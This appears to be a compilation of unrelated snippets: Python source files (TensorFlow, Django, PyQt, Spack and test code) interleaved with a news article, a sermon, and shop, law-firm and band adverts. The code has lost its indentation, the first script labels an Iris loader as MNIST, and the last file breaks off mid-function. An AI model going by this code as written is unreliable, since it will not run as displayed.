for dataInd in range(0, len(splitLines)):
splitLine=splitLines[dataInd]
features[dataInd, :]=splitLine[:4]
labels[dataInd, int(splitLine[4])]=1.0
for ind in range(0, len(features[0])):
features[:, ind]=normalize(features[:, ind])
return features[0:int(3*(len(splitLines)-1)/4)], labels[0:int(3*(len(splitLines)-1)/4)], features[int(3*(len(splitLines)-1)/4):], labels[int(3*(len(splitLines)-1)/4):]
def getClassificationAccuracy(networkOutputs, trueLabels):
numberCorrect=0.0
for labelInd in range(0, len(trueLabels)):
if trueLabels[labelInd][np.argmax(networkOutputs[labelInd], 0)]==1:
numberCorrect=numberCorrect+1
print('Classification Accuracy: '+str(100*(numberCorrect/len(trueLabels)))+'%')
print('Training a neural network on the MNIST Handwriting Classification Problem')
inputs = tf.placeholder(tf.float32, ([None, FEATURES])) #inputs placeholder
trueOutput = tf.placeholder(tf.float32, ([None, NUM_CLASSES])) #correct image label placeholder
#first layer weights and biases
weights1 = tf.Variable(tf.random_normal([FEATURES, hidden1_num_neurons]))
biases1 = tf.Variable(tf.zeros([hidden1_num_neurons]))
hidden1 = tf.nn.sigmoid(tf.matmul(inputs, weights1) + biases1)
#second layer weights and biases
weights2 = tf.Variable(tf.random_normal([hidden1_num_neurons, output_num_neurons]))
biases2 = tf.Variable(tf.zeros([output_num_neurons]))
output = tf.nn.softmax(tf.matmul(hidden1, weights2) + biases2)
#loss function: mean squared error
loss=tf.reduce_mean(tf.square(tf.subtract(output, trueOutput)))
#specify optimization operation ('train op')
optimizer = tf.train.AdamOptimizer()
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
#read MNIST images and tabels
trainImages, trainLabels, valImages, valLabels=loadData('./data/Iris.csv')
#train neural network
BATCH_SIZE=2500;
with tf.Session() as session:
tf.initialize_all_variables().run()
#train for 100 optimization steps (on all 60,000 inputs)
for i in range(0, 40):
shuffle=np.random.permutation(len(trainImages))
sessLoss=0.0
sessOutput=np.zeros([len(trainImages), 10])
for batchInd in range(0, len(trainImages), BATCH_SIZE):
_, batchLoss, batchOutput=session.run([train_op, loss, output], feed_dict={inputs: trainImages[shuffle[batchInd:batchInd+BATCH_SIZE]],
trueOutput: trainLabels[shuffle[batchInd:batchInd+BATCH_SIZE]]})
sessLoss+=batchLoss
sessOutput[batchInd:batchInd+BATCH_SIZE]=batchOutput
print('Epoch '+str(i)+' train loss', sessLoss)
getClassificationAccuracy(sessOutput, trainLabels)
print()
sessLoss, sessOutput=session.run([loss, output], feed_dict={inputs: valImages, trueOutput: valLabels})
print('test loss', sessLoss)
getClassificationAccuracy(sessOutput, valLabels)
|
American nature TV channel Animal Planet has been rebranded with a blue elephant logo, in a bid to create a “strong, distinctive and joyful mark” that also pays homage to the history of the brand.
The rebrand has been completed by New York-based design consultancy Chermayeff & Geismar & Haviv and was revealed by studio partner Sagi Haviv at the Adobe Max conference in Los Angeles on 15 October.
Animal Planet is a paid-for channel that was first aired 22 years ago in 1996 and is owned by American media company Discovery. It shows a range of educational and reality nature programmes and is available to watch throughout the US and 70 other countries across the world, including Canada, India and Japan.
The new logo features a minimal, blue silhouette of an elephant, which appears “almost as a swoosh”, Haviv tells Design Week, with the channel name set in a black, bold sans-serif typeface underneath, all in lowercase.
Although the main application of the logo is blue, it also appears in white and black depending on what imagery, text or communications it is used against. The logotype also changes colour.
The logo is a reinterpretation of a former, more complex logo held by Animal Planet, which featured an elephant cut-out alongside a more realistic image of a globe, with the logotype set underneath these two icons. The primary colour palette was green and white.
Speaking at the Adobe Max conference, Haviv says that Animal Planet had originally asked the design studio to avoid the colour blue and the elephant icon, due to them being common identifiers of environmental charities and channels – but were convinced when the studio was able to evoke a “feeling” in them with its graphic interpretation.
“We ended up with a blue elephant!” he says. “We showed them options and when they saw this one, it captured a feeling for them. Often, we say that a logo can have an attitude, but an emotion is very difficult [to get from] a simple mark.
“[Animal Planet] needed an icon that was strong, bold and distinctive. But how do you do that and still have an energy or joy about it?
The new branding is intended to work across all of Animal Planet’s brand touchpoints, including merchandise and signage at events, as it has extended from being “not only a [TV] channel” to a “whole lifestyle brand” in recent years, says Haviv.
The new Animal Planet branding is currently rolling out across print and digital advertising and marketing materials such as posters, merchandise such as clothing and rucksacks, interiors and signage at events, online platforms, and broadcast.
Good job, I always enjoyed the playfulness of the previous mark so I’m glad to see that carried forward. Is it just me or can anyone else see some kind of whale riding a wave? I wonder if that was intentional and in that case, it’d represent creatures on both land and sea.
|
import argparse
import codecs
import logging
from pyhocon import ConfigFactory
from deep_qa.common.checks import ensure_pythonhashseed_set
from deep_qa.data.instances.instance import TextInstance
from deep_qa.models.memory_networks.differentiable_search import DifferentiableSearchMemoryNetwork
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def main():
"""
This script loads a DifferentiableSearchSolver model, encodes a corpus and the sentences in a
given file, and finds nearest neighbors in the corpus for all of the sentences in the file,
using the trained sentence encoder.
"""
argparser = argparse.ArgumentParser(description="Neural Network Solver")
argparser.add_argument('--param_file', type=str, required=True,
help='Path to file containing solver parameters')
argparser.add_argument('--sentence_file', type=str, required=True,
help='Path to sentence file, for which we will find nearest neighbors')
argparser.add_argument('--output_file', type=str, required=True,
help='Place to save results of nearest neighbor search')
args = argparser.parse_args()
param_file = args.param_file
params = ConfigFactory.parse_file(param_file)
solver = DifferentiableSearchMemoryNetwork(**params) # TODO(matt): fix this in the next PR
solver.load_model()
with codecs.open(args.output_file, 'w', 'utf-8') as outfile:
for line in codecs.open(args.sentence_file, 'r', 'utf-8').readlines():
outfile.write(line)
instance = TextInstance(line.strip(), True)
neighbors = solver.get_nearest_neighbors(instance)
for neighbor in neighbors:
outfile.write('\t')
outfile.write(neighbor.text)
outfile.write('\n')
outfile.write('\n')
if __name__ == "__main__":
ensure_pythonhashseed_set()
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
main()
|
What causes you to believe? I like watching the old Perry Mason episodes on TV. Perry is defense lawyer and he is always going to court for a client that everyone believes is guilty. The hour of the show works like this: the show begins with one person saying to another, "I wish you were dead." The second person invariably ends up murdered and the police collect evidence that makes it pretty easy for the DA, Mr. Burger, to prove that Perry's client did indeed murder the person that they had wished dead. For some reason, though, Perry believes in his client and has the patience to follow a faint trail of bread crumbs until leads him to the real murderer. In the last fifteen minutes of the show, Perry leads the court through a series of witnesses that prove his client couldn't have done it. The guilty party is then forced into a confession. After the commercial, Perry's secretary always asks him how he believed in the client when no one else did. Perry smiles and shakes his head, as if it would be so logical if they had believed in his client from the beginning like he did.
Is faith in Jesus like that? Note that in every Perry Mason episode we, the viewers, find ourselves first believing one thing, then brought to doubt, then brought to believe in something else. This happens relatively rarely in real life. We are all victims of something called confirmation bias. We decide, sometimes on the basis of very little evidence, that something is true. We might use a particular brand of soap, because we believe it works better than another. Even with a side by side test, or an article in Consumer Reports that rates our product last, we remain true believers. We might be in a problematic relationship. They might be abusive. Still, because of this thing that psychologists call confirmation bias, we stick with them. On the other hand, our neighbor might be a good and decent person, yet because of prejudice or a false rumor that we accepted, we might not trust them.
John begins his gospel with a series of seven little miracle stories. John assumes that his reader doesn't believe in Jesus. He has an uphill task, as he writes, for most people in his day and in ours, have a confirmation bias against really believing in Jesus. Oh, most people think Jesus was a great man and had something to do with religion. But few today really see Jesus as the son of the true God sent to earth to save us. John, though, remembers when he overcame his own bias against Jesus. John remembers standing there watching water being taken from a jar and as it is offered to the host of the wedding party, it becomes wine. This is the moment when John's confirmation bias is overcome.
For the rest of his gospel John is like Perry Mason. He calls forth his witnesses one by one. The wedding of Cana is the first of seven episodes. In it a few people really see what is happening. Everyone drinks the wine and wonders where it came from. Everyone has a good time. But only John and a few others see both the miracle and the meaning of it. If Jesus makes new wine and offers it abundantly for all, then the era of God's grace must be beginning. The good news is that our dull lives can be changed, just as this wash water can become the finest wine.
All of this is hidden in the first miracle. Not everyone can be Perry Mason and believe from the beginning. But we all can change. There is not a single person who can't give up their prejudice and worldliness and become a believer in Jesus Christ. The last of the seven miracles involves a man who has been dead for four days. Even Jesus' disciples don't believe that he can do anything for the man named Lazarus. John tells us how Jesus had the tombstone rolled away and Lazarus called back into the living. Seeing this, many come to faith. But as we live our lives, we have to deal with our faith and our doubts with such subtle evidence. Like Perry Mason, we need wisdom to accept the truth early, but also, to be willing to dismiss the falsehoods and prejudices that can cause us to make bad decisions.
|
import json
from django.contrib.auth.models import User
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from api_users.models import ApiUser
def generate_api_user(username='user', email='test@test.com', password='password', login=True):
"""Generate app user
Args:
username: username
email: email
password: password
login: if set to True, a login query is made
Returns:
user, token, header
"""
token = None
header = None
user = User.objects.create(
username=username, email=email, is_active=True)
ApiUser.objects.create(user=user)
user.set_password('password')
user.save()
c = Client()
data = {
'email': 'test@test.com',
'password': 'password',
}
json_data = json.dumps(data)
if login is True:
res = c.post(reverse('api_login'),
json_data, content_type='application/json')
data = json.loads(res.content)
token = Token.objects.get(user=user).key
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token)}
return user, token, header
|
Erb’s Palsy Caused by Medical Malpractice. Erb’s Palsy is a disorder that is often caused by an injury to an infant during birth. Many cases of Erb’s Palsy are the result of an error made by a medical practitioner, such as the delivering physician. Medical malpractice occurs when a medical practitioner causes an injury to a patient by doing something that failed to meet the standard of care for professionals in their field. In these cases, injured patients have the right to seek compensation for their injuries. It is essential for families impacted by Erb’s Palsy to contact an experienced attorney to determine if they have a claim for medical malpractice against the delivering physician.
Infants that suffer from Erb’s Palsy will typically exhibit weakness or sometimes even full paralysis in their arm. The impairment can impact the upper arm or extend to the lower arm and sometimes to the hand. In some cases, the infant’s eyelid on the opposite side of the affected arm will droop. Infants with Erb’s Palsy may not exhibit the Moro reflex (which is a healthy reaction in baby’s when they are startled) on the impacted side.
Erb’s Palsy is the result of damage to the nerves near the brachial plexus. This group of nerves is responsible for movement and feeling in the arm, hand, and fingers. Sometimes during a difficult delivery, a baby can suffer damage to the brachial nerves. This can occur if the baby’s neck is pulled to far too one side if the shoulders are pulled on too hard, and when the arms are under too much pressure, which often occurs in breech birth. The risk of these complications increases due to an overly large baby because the shoulders are more likely to be caught on the mother’s pelvic bones causing a complication referred to as shoulder dystocia. Women with gestational diabetes and short women have a higher risk of these problems during birth. The use of forceps and vacuum extractors also create a larger risk of Erb’s Palsy.
A doctor can be responsible for Erb’s palsy. Improper use of vacuums or forceps, and pulling too hard can all cause the condition. Sometimes a physician might not have monitored the fetus’ size, leading to a baby being delivered vaginally when a C-section should have been performed to avoid the risks of delivering a very large baby.
In cases where the nerves were stretched, the damage might heal within six months to one year. In more severe cases, scar tissue may form around the nerves causing long-term difficulties with the infant’s use of the arm. There are more serious cases as well, where rather than stretching, the nerves are separated from the spinal cord.
In less severe instances, treatment might include stretches and massage. In other situations, surgery might be required to repair the damaged nerve. In some cases, the patient might receive a nerve transplant.
If your family has been impacted by Erb’s Palsy, it is essential to understand your rights and to determine if you are entitled to compensation as a result of the injuries that were caused. Contact Parker Waichman LLP today at 1-800-YOURLAWYER (1-800-968-7529) for a free consultation with one of our experienced medical malpractice attorneys.
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
# def sortedArrayToBST(self, nums):
# """
# :type nums: List[int]
# :rtype: TreeNode
# """
# # Recursion with slicing
# if not nums:
# return None
# mid = len(nums) / 2
# root = TreeNode(nums[mid])
# root.left = self.sortedArrayToBST(nums[:mid])
# root.right = self.sortedArrayToBST(nums[mid + 1:])
# return root
def sortedArrayToBST(self, nums):
# Recursion with index
return self.getHelper(nums, 0, len(nums) - 1)
def getHelper(self, nums, start, end):
if start > end:
return None
mid = (start + end) / 2
node = TreeNode(nums[mid])
node.left = self.getHelper(nums, start, mid - 1)
node.right = self.getHelper(nums, mid + 1, end)
return node
|
Mark Hargin Farm is one of the businesses that on 09/25/2012 have passed an inspection from the USDA National Organic Program Accredited Inspection Agency. This company is placed in a quiet vicinity at 1624 320Th St in Bedford, Iowa 50833. The unique ID number for this operation is 2580001166. OneCert, Inc is the representative who was authorized to certify the operation. This company provides following certified products: Other: Corn, Pasture.
|
import logging
from core import *
_log = logging.getLogger(__file__)
def make_dead(insts, idx):
org_inst = insts[idx]
if org_inst.op == "DEAD":
return
if org_inst.side_effect():
org_inst.dest = None
else:
dead = Inst(None, "DEAD", [])
dead.addr = org_inst.addr
insts[idx] = dead
insts[idx].comments["org_inst"] = org_inst
def dead_code_elimination_forward(bblock):
"""Try to perform eliminations using forward flow. This is reverse
to the natural direction, and requires multiple passing over
bblock to stabilize. Don't use it, here only for comparison."""
vars = bblock.defs()
for v in vars:
last = None
for i, inst in enumerate(bblock.items):
if v in inst.args:
last = None
if inst.dest == v:
if last is not None:
make_dead(bblock.items, last)
last = i
node = bblock.cfg[bblock.addr]
live_out = node.get("live_out")
if last is not None and live_out is not None:
if v not in live_out:
make_dead(bblock.items, last)
def dead_code_elimination_backward(bblock):
node = bblock.cfg[bblock.addr]
live = node.get("live_out")
if live is None:
_log.warn("BBlock %s: No live_out set, conservatively assuming all defined vars are live", bblock.addr)
live = bblock.defs()
live = live.copy()
changes = False
for i in range(len(bblock.items) - 1, -1, -1):
inst = bblock.items[i]
if isinstance(inst.dest, REG):
if inst.dest in live:
live.remove(inst.dest)
else:
make_dead(bblock.items, i)
changes = True
inst = bblock.items[i]
live |= inst.uses()
return changes
dead_code_elimination = dead_code_elimination_backward
|
Find the perfect rug for any room in your home.
Family owned and operated in South Burlington, Vermont for more than 30 years.
Traditional, contemporary and antique rugs from around the world! Our wide selection is the best in Vermont.
Our effective and 100% safe rug cleaning service is unmatched. Bring your old carpet back to life.
|
# ORIGINAL here: https://github.com/PyCQA/astroid/blob/main/script/bump_changelog.py
# DO NOT MODIFY DIRECTLY
"""
This script permits to upgrade the changelog in astroid or pylint when releasing a version.
"""
# pylint: disable=logging-fstring-interpolation
import argparse
import enum
import logging
from datetime import datetime
from pathlib import Path
from typing import List
DEFAULT_CHANGELOG_PATH = Path("ChangeLog")
RELEASE_DATE_TEXT = "Release date: TBA"
WHATS_NEW_TEXT = "What's New in Pylint"
TODAY = datetime.now()
FULL_WHATS_NEW_TEXT = WHATS_NEW_TEXT + " {version}?"
NEW_RELEASE_DATE_MESSAGE = "Release date: {}".format(TODAY.strftime("%Y-%m-%d"))
def main() -> None:
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("version", help="The version we want to release")
parser.add_argument(
"-v", "--verbose", action="store_true", default=False, help="Logging or not"
)
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
logging.debug(f"Launching bump_changelog with args: {args}")
if "dev" in args.version:
return
with open(DEFAULT_CHANGELOG_PATH) as f:
content = f.read()
content = transform_content(content, args.version)
with open(DEFAULT_CHANGELOG_PATH, "w") as f:
f.write(content)
class VersionType(enum.Enum):
MAJOR = 0
MINOR = 1
PATCH = 2
def get_next_version(version: str, version_type: VersionType) -> str:
new_version = version.split(".")
part_to_increase = new_version[version_type.value]
if "-" in part_to_increase:
part_to_increase = part_to_increase.split("-")[0]
for i in range(version_type.value, 3):
new_version[i] = "0"
new_version[version_type.value] = str(int(part_to_increase) + 1)
return ".".join(new_version)
def get_next_versions(version: str, version_type: VersionType) -> List[str]:
if version_type == VersionType.PATCH:
# "2.6.1" => ["2.6.2"]
return [get_next_version(version, VersionType.PATCH)]
if version_type == VersionType.MINOR:
# "2.6.0" => ["2.7.0", "2.6.1"]
assert version.endswith(".0"), f"{version} does not look like a minor version"
else:
# "3.0.0" => ["3.1.0", "3.0.1"]
assert version.endswith(".0.0"), f"{version} does not look like a major version"
next_minor_version = get_next_version(version, VersionType.MINOR)
next_patch_version = get_next_version(version, VersionType.PATCH)
logging.debug(f"Getting the new version for {version} - {version_type.name}")
return [next_minor_version, next_patch_version]
def get_version_type(version: str) -> VersionType:
if version.endswith("0.0"):
version_type = VersionType.MAJOR
elif version.endswith("0"):
version_type = VersionType.MINOR
else:
version_type = VersionType.PATCH
return version_type
def get_whats_new(
version: str, add_date: bool = False, change_date: bool = False
) -> str:
whats_new_text = FULL_WHATS_NEW_TEXT.format(version=version)
result = [whats_new_text, "=" * len(whats_new_text)]
if add_date and change_date:
result += [NEW_RELEASE_DATE_MESSAGE]
elif add_date:
result += [RELEASE_DATE_TEXT]
elif change_date:
raise ValueError("Can't use change_date=True with add_date=False")
logging.debug(
f"version='{version}', add_date='{add_date}', change_date='{change_date}': {result}"
)
return "\n".join(result)
def get_all_whats_new(version: str, version_type: VersionType) -> str:
result = ""
for version_ in get_next_versions(version, version_type=version_type):
result += get_whats_new(version_, add_date=True) + "\n" * 4
return result
def transform_content(content: str, version: str) -> str:
version_type = get_version_type(version)
next_version = get_next_version(version, version_type)
old_date = get_whats_new(version, add_date=True)
new_date = get_whats_new(version, add_date=True, change_date=True)
next_version_with_date = get_all_whats_new(version, version_type)
do_checks(content, next_version, version, version_type)
index = content.find(old_date)
logging.debug(f"Replacing\n'{old_date}'\nby\n'{new_date}'\n")
content = content.replace(old_date, new_date)
end_content = content[index:]
content = content[:index]
logging.debug(f"Adding:\n'{next_version_with_date}'\n")
content += next_version_with_date + end_content
return content
def do_checks(content, next_version, version, version_type):
err = "in the changelog, fix that first!"
NEW_VERSION_ERROR_MSG = (
"The text for this version '{version}' did not exists %s" % err
)
NEXT_VERSION_ERROR_MSG = (
"The text for the next version '{version}' already exists %s" % err
)
wn_next_version = get_whats_new(next_version)
wn_this_version = get_whats_new(version)
# There is only one field where the release date is TBA
if version_type in [VersionType.MAJOR, VersionType.MINOR]:
assert (
content.count(RELEASE_DATE_TEXT) <= 1
), f"There should be only one release date 'TBA' ({version}) {err}"
else:
next_minor_version = get_next_version(version, VersionType.MINOR)
assert (
content.count(RELEASE_DATE_TEXT) <= 2
), f"There should be only two release dates 'TBA' ({version} and {next_minor_version}) {err}"
# There is already a release note for the version we want to release
assert content.count(wn_this_version) == 1, NEW_VERSION_ERROR_MSG.format(
version=version
)
# There is no release notes for the next version
assert content.count(wn_next_version) == 0, NEXT_VERSION_ERROR_MSG.format(
version=next_version
)
if __name__ == "__main__":
main()
|
UC returns for another crazy dance party at the Towne Tavern! Free e-z parking, good eats and the drinks will be flowing! Text ur friends & C U where the party will be...with U/C from 8 pm - 12 am! Must be 21 or older.
Style: PARTY DANCE BAND! The Uncommitted delivers the best female fronted high-energy dance show with all your favorite hits of pop, rock, top 40 & more from the 80's thru 2day!
Members: The Uncommitted brings the best, female fronted, high-energy show that will keep your heart pumpin’ and your body jumpin’ on the dance floor! You'll recognize every song. All your favorites from the 80's, 90's & today. You’ll dance for hours and be back for more! Join us on the dance floor & see why everyone is talking about this fun, party dance band!
U/C has a wealth of experience in the music industry so if you're looking for a band to entertain a crowd, dance all night and sing along with every recognizable hit then look no further! With 4 vocalists, tight harmonies and strong musicianship is what we bring to every performance!
All the members from this band are experienced musicians who have played in bands such as: Kaos, Spiral, Special Delivery, No Presents for Christmas, Still All Stars, Still Bound, Garage All Stars, Stagger Wing & The Fashionably Late. We bring a wealth of professionalism and experience to the table as well as a good following of fans! Hire us for your next nightclub gig or private event and keep those cash registers ringing, your dance floor packed and your audience screaming for more! We have a large inventory of music which can please any type of audience.
|
import os
import unittest
import unittest.mock
import feedparser
from plugins.feedretriever.feedretriever import Feedpoller
def noop(*a, **kw):
pass
feedparse = feedparser.parse
class FeedRetriverTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.dir = os.path.join("..", os.path.dirname(__file__))
@unittest.mock.patch("feedparser.parse")
def test_basic_feed(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=noop,
on_error=self.fail,
)
@unittest.mock.patch("feedparser.parse")
def test_no_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
feed = Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=self.fail,
on_error=self.fail,
)
feed.update_now()
@unittest.mock.patch("feedparser.parse")
def test_initial_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
def on_entry(feed, entry):
self.assertEqual(entry.title, "Test Title")
self.assertEqual(entry.link, "http://www.example.com")
self.updated = True
feed = Feedpoller(
{"url": "MOCK_URL", "title": "Test"},
on_created=noop,
on_entry=on_entry,
on_error=self.fail,
)
self.updated = False
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_1-entries.xml"))
feed.update_now()
self.assertTrue(self.updated)
|
Book any of our services ONLINE using out LIVE booking system.
We provide MOT Testing for class 4 and class 7 vehicles with FREE retests.
Book an MOT online now with our live, online booking system. Just select the date and time that suits you from our live, online booking diary. Booking an MOT couldn't be easier with this 24/7 interactive system.
Clean, Comfortable and Prompt Appointments.
Somewhere clean and comfortable to sit and wait, and somewhere for the kids too.
Because we have large vehicle lifts up to 6000kgs with a bed length longer than most class 4 testers we can cope with large motor homes and small horse boxes which normally have to go to a class 7 tester or to the local ministry test station because of their size. Our class 7 Bay can cope with the longest of Transits or Sprinters. If you are in doubt which class your vehicle falls in to please call us, we will be pleased to advise you.
We are the home of Wigley Racing which is a motorbike racing team of twin brothers.
|
from nose.tools import eq_
from ..sessionizer import Sessionizer
def test_sessionizer():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process("foo", 1))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("foo", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 10))
eq_(len(user_sessions), 2)
user_sessions = list(sessionizer.get_active_sessions())
eq_(len(user_sessions), 1)
def test_none_comparison():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process((None, "123"), 0, "AIDS"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, None))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Barfoo"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 10))
eq_(len(user_sessions), 3)
|
The goblet is surrounded by elegant lost wax cast bronze, gilded and silver plated, depicting the Last Supper.
Height 17 cm / 6,69"
Height cm 21 / 8,27"
In gilded metal. The goblet is surrounded by elegant lost wax cast bronze, gilded and silver plated, depicting the Last Supper.
It has a 15 cm diameter.
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyJpype(PythonPackage):
"""JPype is an effort to allow python programs full access to java class
libraries."""
homepage = "https://github.com/originell/jpype"
url = "https://pypi.io/packages/source/J/JPype1/JPype1-0.6.2.tar.gz"
version('0.6.2', '16e5ee92b29563dcc63bbc75556810c1')
version('0.6.1', '468ca2d4b2cff7802138789e951d5d58')
version('0.6.0', 'f0cbbe1d0c4b563f7e435d2bffc31736')
depends_on('python@2.6:')
depends_on('py-setuptools', type='build')
depends_on('java', type=('build', 'run'))
# extra requirements
# depends_on('py-numpy@1.6:', type=('build', 'run'))
|
Pothashang News Service: Imphal, September 20, 2018: “Heikru Hidongba” festival of Manipur was celebrated on Thursday with “Hiyang Tannaba” a traditional boat race at Sagolband Bijoy Govinda Thangabat (a moat) in Imphal with pomp and gaiety.
Manipur governor Dr. Najma Heptulla graced the 240th Heikru- Hidongba celebration as the chief guest. It was organised by Shri Shri Bijoy Govinda Sevayet Committee.
Heptulla said it is her second time attending the Heikru Hidongba.
The festival is observed by the Meitei community on the eleventh day of the fortnight of Langban month or September of the Meitei calendar every year. It is considered as an important and joyous festival and has been observed for years at the Moat or Thangapat of Shri Shri Bijoy Govindajee Temple. Recognising the significance of the festival, she instituted the Governor’s Trophy for the Boat Race, she added.
Heikru-Hidongba is a socio-religious ceremony performed every year accompanied with the exciting contest of ‘Hiyang Tanaba’ or Boat Race in the sacred Thangapat Moat of Sagolband, Bijoy Govinda. This festival is not a mere visual festivity but a festival accompanied with the old folklore tradition and culture of the Meiteis and reviving age-old tradition in the form of a festival, she added.
She said Heikru-Hidongba is an annual event performed in the shape of worship and game to commemorate the mysterious way of victory by our heroic fore-fathers over the invincible hordes of foreign aggressors. Heikru-Hidongba festival, therefore, is celebrated based on historical truth. It is also a ceremony to signify the symbol of unity that was once deeply rooted amongst our heroic and loyal forefathers in their struggles for the nation’s peace and freedom, she added.
She also stated that the festival has also a great meaning in the field of moral science and political philosophy. The more we observe and study this public function, the more we will learn about the heart and soul of our ancestors who sacrificed their most precious lives without the least grumbling for peace and freedom of our people.
The governor gave the governor’s trophy, certificates and cash prize of Rs 15,000 to the winner and Rs 10,000 and certificates to the runners-up team of the boat race.
|
from PyQt5 import QtCore, QtGui, QtWidgets
_fromUtf8 = lambda s: s
import sys,os
import wound_view as view
import engine
class woundWindow ( QtWidgets.QMainWindow ):
def __init__ ( self, parent = None ):
QtWidgets.QMainWindow.__init__( self, parent )
self.setWindowTitle( 'Scratch Test Wizard' )
self.ui = view.Ui_facewindow()
self.ui.setupUi( self )
self.setConnections()
self.rebuilding = False
self.selectedItem = None
def refreshTree(self):
self.rebuilding = True
self.ui.treeWidget.clear()
for i in range(len(self.exp)):
el = QtWidgets.QTreeWidgetItem(self.ui.treeWidget)
el.src= self.exp[i]
if self.exp[i].time is None:
tm = 'T{}'.format(i)
else:
tm = self.exp[i].time
el.setText(0,tm)
for w in self.exp[i]:
e = QtWidgets.QTreeWidgetItem(el)
e.src = w
e.setText(0,w.basename)
#e.setBackground(0,QtGui.QColor(255, 0, 0, 127))
n=1
for p in w:
o = QtWidgets.QTreeWidgetItem(e)
o.src = p
o.setText(0, p.filename)
#o.setForeground(0,QtGui.QColor(255,0,0,255))
self.ui.treeWidget.addTopLevelItem(el)
self.rebuilding = False
#fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Select file', './')
#q = QtWidgets.QFileDialog()
#q.setAcceptMode(QtWidgets.QFileDialog.AcceptOpen)
#q.setFileMode(QtWidgets.QFileDialog.ExistingFiles)
#progress = QtWidgets.QProgressDialog("Opening files...", "Cancel opening", 0, pmax)
def selectElement(self,item):
if self.rebuilding is True:
return
self.selectedItem = item
self.ui.statusBar.showMessage('ITEM {} depth {}'.format(item.src.basename,item.src.depth))
#self.ui.treeWidget.itemWidget()
def expSave(self):
filtered = QtWidgets.QFileDialog.getSaveFileName(self,caption='Save the experiment',filter='*.exp')
if filtered[0] != '':
filename = filtered[0]
if filename[-4:] != '.exp':
filename = filename + '.exp'
self.exp.save(filename)
def expLoad(self):
selection = QtWidgets.QFileDialog.getOpenFileName (self, caption='Select an experiment file',filter='*.exp')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
self.exp = engine.load(filename)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
def expGuess(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
exp = engine.exp()
if exp.guess(folder):
self.exp = exp
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as an experiment')
def rewatch(self):
self.watch()
def watch(self,element=None):
if self.rebuilding is True:
return
if element is None:
element = self.selectedItem
myelement = element.src
if myelement.is_picture():
QtWidgets.QApplication.setOverrideCursor( QtGui.QCursor(QtCore.Qt.WaitCursor))
if self.ui.view_raw.isChecked():
self.ui.pic.setPixmap( QtGui.QPixmap(myelement.dir) )
elif self.ui.view_stored.isChecked():
if myelement.isProcessed():
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
else:
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.dir))
elif self.ui.view_otf.isChecked():
myelement.process( sens = self.ui.cannysigma.value()/100.0, minhole=self.ui.minholes.value(),minobj=self.ui.minobj.value() )
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
QtWidgets.QApplication.restoreOverrideCursor()
def tpAdd(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
tp = engine.timepoint()
if tp.guess(folder):
self.exp.append(tp)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
